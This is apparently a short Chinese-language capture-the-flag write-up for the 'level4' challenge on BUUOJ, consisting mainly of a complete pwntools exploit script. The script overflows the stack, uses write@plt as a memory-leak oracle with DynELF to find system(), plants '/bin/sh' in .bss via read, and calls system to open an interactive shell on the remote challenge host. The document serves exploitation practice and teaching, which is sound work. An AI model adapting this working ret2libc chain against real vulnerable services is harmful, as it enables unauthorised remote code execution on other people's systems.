1,三连
2,偏移
3,IDA静态查看是否有ret利用点
思路: ret2libc, 通过 write 泄露内存来获取 libc 基址
4,ldd查看
5,payload
自动查Libc版本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from time import sleep
import sys
# Target binary; pwntools takes arch/word size for flat()/cyclic() from it.
context.binary = "./level4"
elf = context.binary
# Terminal used only if gdb.attach() is enabled later in the script.
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
# "l" selects a local process, anything else the remote instance.
# NOTE(review): sys.argv[1] is read unconditionally, so running the script
# with no argument raises IndexError here instead of a usage message.
if sys.argv[1] == "l":
    io = process("./level4")
else:
    io = remote('node4.buuoj.cn',28365)
def leak(addr):
    """Leak oracle for DynELF: return the 4 bytes at ``addr`` in the target.

    The payload pads 0x88 + 4 bytes up to the saved return address, then
    returns into write@plt with arguments (1, addr, 4) -- i.e.
    write(stdout, addr, 4). The return address after write is _start, so
    the program restarts and the same overflow can be triggered again for
    the next lookup.
    """
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    # Give the target time to perform the write before reading back exactly
    # the 4 bytes it emitted.
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked
# Resolve system() purely through the leak oracle: DynELF walks the target's
# dynamic-linker structures via leak(), so no local libc copy or version
# guessing is needed.
d = DynELF(leak, elf=ELF('./level4'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
pause()
# gdb.attach(io)
# NOTE(review): every stage below depends on fixed addresses (non-PIE binary,
# .bss at a known address) and on the overflow reaching the saved return
# address unchecked (no stack canary); confirm both with checksec before
# relying on this chain.
# Stage 2: read(0, bss + 0x500, 8) stores the 8-byte "/bin/sh\0" string at a
# writable, fixed address in .bss, then returns to _start once more.
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)
# Stage 3: system(bss + 0x500); 'aaaa' is only a dummy return address for
# system, which never needs to return cleanly.
payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)
io.interactive()